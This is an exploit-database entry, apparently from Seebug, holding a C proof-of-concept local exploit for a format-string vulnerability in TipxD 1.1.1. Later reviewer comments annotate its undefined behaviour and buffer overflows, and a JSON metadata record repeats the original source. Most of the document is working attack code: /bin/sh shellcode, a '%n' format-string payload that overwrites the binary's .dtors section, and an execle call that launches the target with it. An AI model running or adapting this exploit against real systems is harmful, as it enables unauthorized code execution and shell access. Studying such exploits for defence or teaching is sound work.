ID SSV:62943
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
/* tipxd_exp.c
TipxD Format String Vulnerability
TipxD <= 1.1.1 local exploit (Proof of Concept)
Tested in Slackware 9.0 / 9.1 / 10.0
by CoKi <coki@nosystem.com.ar> - SECU
No System Group - http://www.nosystem.com.ar
*/
#include <stdio.h>
#include <string.h>
#define PATH "/bin/tipxd"
#define OBJDUMP "/usr/bin/objdump"
#define GREP "/usr/bin/grep"
/* Raw 32-bit x86 machine code (aleph1's widely published sample); the last
 * seven bytes 2f 62 69 6e 2f 73 68 are the ASCII string "/bin/sh".  main()
 * hands this array to the target as its only environment string via env[].
 * It is declared unsigned char[] but stored into a char *[] in main(), a
 * pointer-sign mismatch that -Wpointer-sign reports. */
unsigned char shellcode[]= /* aleph1 shellcode.45b */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68";
int check(unsigned long addr);
/*
 * PoC entry point: locates the .dtors section of /bin/tipxd with objdump,
 * builds a "%08x..."/"%n" format-string payload aimed at it and launches the
 * binary with that payload as the value of "-f".  argc/argv are unused; all
 * inputs come from the PATH/OBJDUMP/GREP constants, so no external data
 * reaches sprintf() or popen() in this program.
 *
 * Portability/correctness notes: the file includes only <stdio.h> and
 * <string.h>.  exit() needs <stdlib.h>, execle() needs <unistd.h>, bzero()
 * needs <strings.h>, and popen()/pclose() are POSIX rather than ISO C, so
 * these calls are implicitly declared (an error in C99 and later).  The
 * hard-coded 0xbffffffa stack top and the 32-bit address arithmetic tie the
 * code to the pre-ASLR 32-bit systems named in the header comment.
 * Reaching the closing brace of main() returns 0 under C99 rules.
 */
int main(int argc, char *argv[]) {
int i, dtorsaddr;
unsigned int bal1, bal2, bal3, bal4;
char temp[512];
char buffer[1024];
char nop1[255], nop2[255];
char nop3[255], nop4[255];
int cn1, cn2, cn3, cn4;
FILE *f;
/* env[2] is implicitly NULL.  shellcode is unsigned char[], so this
 * initializer carries a pointer-sign mismatch. */
char *env[3] = {shellcode, NULL};
/* Assumed address of the environment string on a fixed 32-bit stack;
 * strlen() returns size_t and the result is narrowed to int. */
int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);
/* finding .dtors address */
/* The command is assembled from compile-time constants only.  The popen()
 * result is never checked: if objdump or grep is absent, f is NULL and the
 * fscanf() below dereferences it.  "%08x" formally wants an unsigned int *. */
sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
f = popen(temp, "r");
if(fscanf(f, " %08x", &dtorsaddr) != 1) {
pclose(f);
printf("Cannot find .dtors address\n");
exit(1);
}
pclose(f);
/* Move one word past the address grep matched (presumably the slot after the
 * 0xffffffff header word of .dtors; not stated by the author). */
dtorsaddr = dtorsaddr + 4;
printf("\n TipxD <= 1.1.1 local exploit (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");
/* "%p" expects a void *; passing an int is undefined behaviour that only
 * happens to work where int and pointers occupy the same argument slot. */
printf(" shellcode address = %.8p\n", shaddr);
printf(" .dtors address = %.8p\n\n", dtorsaddr);
bzero(temp, sizeof(temp));
bzero(buffer, sizeof(buffer));
/* Single filler byte in front of the addresses; its purpose is not
 * documented by the author (presumably alignment of what follows). */
strcat(buffer, "x");
/* adding .dtors address */
/* Appends the raw little-endian bytes of dtorsaddr, dtorsaddr+1, ... by
 * passing an int * where "%s" expects a char *: undefined behaviour, and a
 * 0x00 byte inside the address would end the copy early. */
for(i = 0; i < 4; i++) {
bzero(temp, sizeof(temp));
sprintf(temp, "%s", &dtorsaddr);
strncat(buffer, temp, 4);
dtorsaddr++;
}
/* convert shellcode address location */
memset(nop1, 0, 255);
memset(nop2, 0, 255);
memset(nop3, 0, 255);
memset(nop4, 0, 255);
/* Split the value to be written into its four bytes, most significant first. */
bal1 = (shaddr & 0xff000000) >> 24;
bal2 = (shaddr & 0x00ff0000) >> 16;
bal3 = (shaddr & 0x0000ff00) >> 8;
bal4 = (shaddr & 0x000000ff);
/* Pad lengths between consecutive "%n" writes; check() adds 256 once to a
 * non-positive result.  The constants in cn1 account for bytes emitted before
 * the first "%n" (the derivation is the author's and is not spelled out). */
cn1 = bal4 - 16 - 15 - 48 - 2 -1;
cn1 = check(cn1);
cn2 = bal3 - bal4 - 2;
cn2 = check(cn2);
cn3 = bal2 - bal3 - 2;
cn3 = check(cn3);
cn4 = bal1 - bal2 - 2;
cn4 = check(cn4);
/* NOTE(review): each nop buffer is 255 bytes.  check() compensates only
 * once, so a difference below -256 stays negative and reaches memset() as a
 * huge size_t; a count of exactly 255 would leave no NUL for "%s" below. */
memset(nop1, '\x90', cn1);
memset(nop2, '\x90', cn2);
memset(nop3, '\x90', cn3);
memset(nop4, '\x90', cn4);
/* Six "%08x" consume stack words, then four "%n" writes each preceded by
 * its pad.  NOTE(review): temp is 512 bytes while the four pads alone can
 * approach 1000 bytes, and this sprintf() is unbounded, so the PoC can
 * overflow its own stack buffer (buffer[1024] on the strcat below too). */
sprintf(temp, "%%08x%%08x%%08x%%08x%%08x%%08x"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n\x90\x90\x90\x90"
,nop1, nop2, nop3, nop4);
strcat(buffer, temp);
/* The vulnerable sink in the target is presumably the "-f" argument, which
 * is passed through unmodified; env supplies the shellcode string only.
 * The return value of execle() is not checked, so a failed exec falls off
 * the end of main() silently. */
execle(PATH, "tipxd", "-f", buffer, NULL, env);
}
/*
 * Normalize a pad length so that it is positive.
 *
 * addr is formatted with "%d" although it is an unsigned long: a format/
 * argument mismatch and therefore undefined behaviour (on a 32-bit ABI it
 * happens to reinterpret the value as a signed int).  The text is parsed
 * back with atoi() -- which needs <stdlib.h>, not included by this file --
 * and if the result is below 1, 256 is added exactly once.  The unsigned
 * long return value is then truncated to int at the call sites in main().
 * Because the observable behaviour rests on that undefined conversion, the
 * function is documented rather than rewritten here.
 */
int check(unsigned long addr) {
char tmp[128];
snprintf(tmp, sizeof(tmp), "%d", addr);
if(atoi(tmp) < 1)
addr = addr + 256;
return addr;
}
// milw0rm.com [2004-12-14]
{"href": "https://www.seebug.org/vuldb/ssvid-62943", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "TipxD <= 1.1.1 - Local Format String Vulnerability (not setuid)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-62943", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n /* tipxd_exp.c\r\n\r\nTipxD Format String Vulnerability\r\n\r\nTipxD <= 1.1.1 local exploit (Proof of Concept)\r\n\r\nTested in Slackware 9.0 / 9.1 / 10.0\r\n\r\nby CoKi <coki@nosystem.com.ar> - SECU\r\nNo System Group - http://www.nosystem.com.ar\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n\r\n#define PATH "/bin/tipxd"\r\n#define OBJDUMP "/usr/bin/objdump"\r\n#define GREP "/usr/bin/grep"\r\n\r\nunsigned char shellcode[]= /* aleph1 shellcode.45b */\r\n"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c"\r\n"\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb"\r\n"\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e"\r\n"\\x2f\\x73\\x68";\r\n\r\nint check(unsigned long addr);\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\nint i, dtorsaddr;\r\nunsigned int bal1, bal2, bal3, bal4;\r\nchar temp[512];\r\nchar buffer[1024];\r\nchar nop1[255], nop2[255];\r\nchar nop3[255], nop4[255];\r\nint cn1, cn2, cn3, cn4;\r\nFILE *f;\r\nchar *env[3] = {shellcode, NULL};\r\nint shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);\r\n\r\n/* finding .dtors address */\r\nsprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);\r\nf = popen(temp, "r");\r\nif(fscanf(f, " %08x", &dtorsaddr) != 1) {\r\npclose(f);\r\nprintf("Cannot find .dtors address\\n");\r\nexit(1);\r\n}\r\npclose(f);\r\ndtorsaddr = dtorsaddr + 4;\r\n\r\nprintf("\\n TipxD <= 1.1.1 local exploit (Proof of Concept)\\n");\r\nprintf(" by CoKi <coki@nosystem.com.ar>\\n\\n");\r\nprintf(" shellcode 
address = %.8p\\n", shaddr);\r\nprintf(" .dtors address = %.8p\\n\\n", dtorsaddr);\r\n\r\nbzero(temp, sizeof(temp));\r\nbzero(buffer, sizeof(buffer));\r\n\r\nstrcat(buffer, "x");\r\n\r\n/* adding .dtors address */\r\nfor(i = 0; i < 4; i++) {\r\nbzero(temp, sizeof(temp));\r\nsprintf(temp, "%s", &dtorsaddr);\r\nstrncat(buffer, temp, 4);\r\ndtorsaddr++;\r\n}\r\n\r\n/* convert shellcode address location */\r\nmemset(nop1, 0, 255);\r\nmemset(nop2, 0, 255);\r\nmemset(nop3, 0, 255);\r\nmemset(nop4, 0, 255);\r\n\r\nbal1 = (shaddr & 0xff000000) >> 24;\r\nbal2 = (shaddr & 0x00ff0000) >> 16;\r\nbal3 = (shaddr & 0x0000ff00) >> 8;\r\nbal4 = (shaddr & 0x000000ff);\r\n\r\ncn1 = bal4 - 16 - 15 - 48 - 2 -1;\r\ncn1 = check(cn1);\r\ncn2 = bal3 - bal4 - 2;\r\ncn2 = check(cn2);\r\ncn3 = bal2 - bal3 - 2;\r\ncn3 = check(cn3);\r\ncn4 = bal1 - bal2 - 2;\r\ncn4 = check(cn4);\r\n\r\nmemset(nop1, '\\x90', cn1);\r\nmemset(nop2, '\\x90', cn2);\r\nmemset(nop3, '\\x90', cn3);\r\nmemset(nop4, '\\x90', cn4);\r\n\r\nsprintf(temp, "%%08x%%08x%%08x%%08x%%08x%%08x"\r\n"%s\\xeb\\x02%%n"\r\n"%s\\xeb\\x02%%n"\r\n"%s\\xeb\\x02%%n"\r\n"%s\\xeb\\x02%%n\\x90\\x90\\x90\\x90"\r\n,nop1, nop2, nop3, nop4);\r\n\r\nstrcat(buffer, temp);\r\n\r\nexecle(PATH, "tipxd", "-f", buffer, NULL, env);\r\n}\r\n\r\nint check(unsigned long addr) {\r\nchar tmp[128];\r\nsnprintf(tmp, sizeof(tmp), "%d", addr);\r\nif(atoi(tmp) < 1)\r\naddr = addr + 256;\r\n\r\nreturn addr;\r\n}\r\n\r\n// milw0rm.com [2004-12-14]\r\n\n ", "id": "SSV:62943", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T16:55:45", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-11-19T16:55:45", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:55:45", "rev": 2}, "vulnersScore": -0.1}, "references": []}
{}